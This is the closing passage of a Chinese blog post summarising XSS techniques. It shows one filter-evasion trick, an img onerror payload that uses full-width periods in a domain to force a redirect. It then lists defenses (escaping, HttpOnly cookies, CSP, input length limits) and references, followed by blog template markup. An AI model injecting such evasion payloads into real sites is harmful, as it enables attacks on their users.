            </figure><br>6.使用中文逗号代替英文逗号<br>如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号<p></p>
<pre><code>&lt;img src="x" onerror="document.location=`http://www。baidu。com`"&gt;//会自动跳转到百度
</code></pre><h1 id="如何防止xss"><a href="#如何防止xss" class="headerlink" title="如何防止xss"></a>如何防止xss</h1><ul>
<li>过滤一些危险字符，以及转义<code>&amp; &lt; &gt; " ' /</code>等危险字符</li>
<li>HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此Cookie。</li>
<li>设置CSP(Content Security Policy)</li>
<li>输入内容长度限制</li>
</ul>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>感觉总结的不是很全面，以后会查漏补缺，如果有师傅发现错误之处，还望斧正</p>
<h1 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h1><p><a href="https://html5sec.org/" title="https://html5sec.org/" target="_blank" rel="noopener">https://html5sec.org/</a><br><a href="https://blog.csdn.net/qq_29277155/article/details/51320064" title="很全的xss总结" target="_blank" rel="noopener">很全的xss总结</a><br><a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" title="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" target="_blank" rel="noopener">https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    最后更新时间：<time datetime="2019-05-14T16:30:36.068Z" itemprop="dateUpdated">2019-05-15 00:30:36</time>
</span><br>


        
        know it then hack it
        
    </div>
    
    <footer>
        <a href="https://byqiyou.github.io">
            <img src="/img/avatar.jpg" alt="">
            
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web安全/">web安全</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/xss/">xss</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/02/16/xss总结/&title=《xss总结》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/02/16/xss总结/&title=《xss总结》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/02/16/xss总结/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《xss总结》 — 七友&url=https://byqiyou.github.io/2019/02/16/xss总结/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/02/16/xss总结/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2019/04/04/Bypass-disabled-functions一些思路总结/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">Bypass-disabled_functions一些思路总结</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2019/02/14/XSS-Thousand-Knocks解题记录/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">XSS-Thousand-Knocks解题记录</h4>
      </a>
    </div>
  
</nav>



    


<section class="comments" id="comments">
    <div id="disqus_thread"></div>
    <script>
    var disqus_shortname = 'true';
    lazyScripts.push('//' + disqus_shortname + '.disqus.com/embed.js')
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</section>



















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        Thinks
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/2.png" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
                data-wechat="/img/2.png" data-alipay="/img/alipay.jpg">
            <div class="reward-toggle-ctrol">
                <span class="reward-toggle-item wechat">微信</span>
                <span class="reward-toggle-label"></span>
                <span class="reward-toggle-item alipay">支付宝</span>
            </div>
        </label>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>博客内容遵循 <a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议</a></span>
        </p>
    </div>
    <div class="bottom">
        <p><span> &copy; 2015 - 2019</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/02/16/xss总结/&title=《xss总结》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/02/16/xss总结/&title=《xss总结》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/02/16/xss总结/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《xss总结》 — 七友&url=https://byqiyou.github.io/2019/02/16/xss总结/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/02/16/xss总结/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=https://byqiyou.github.io/2019/02/16/xss总结/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = 'Leave';
            clearTimeout(titleTime);
        } else {
            document.title = 'Come back';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
